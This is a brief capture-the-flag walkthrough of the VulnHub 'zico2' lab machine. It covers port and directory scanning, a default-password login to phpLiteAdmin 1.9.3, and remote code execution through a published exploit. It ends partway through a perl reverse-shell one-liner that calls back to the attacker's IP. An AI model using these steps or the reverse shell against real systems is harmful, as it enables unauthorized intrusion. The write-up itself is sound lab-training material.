0xbc

This article is walk through about zico machine in vulnub VM can download from here: https://www.vulnhub.com/entry/zico2-1,210/ As a shortcut, the method I use: LFI operation system exploit Let's Start: As always, start finding the IP for machine, mine is 172.16.194.203 nmap scan, find port open on 22,80,111 dirb scan, found interesting dbadmin folder after browse, found php login with password "admin" After login, found version is phpLiteAdmin 1.9.3 phpLiteAdmin 1.9.3 is vulnerable to Remote Code Execution https://www.exploit-db.com/exploits/24044/ After using RCE, for example I can execute "locate nc" in victim machine: Exploit: After some try and error, I found I can use perl reverse shell found other kinds of reverse shell-> locate perl in /usr/bin/perl ->do  /usr/bin/perl -h will give feedback /usr/bin/perl -e 'use Socket;$i="172.16.194.142";$p=1234;socket(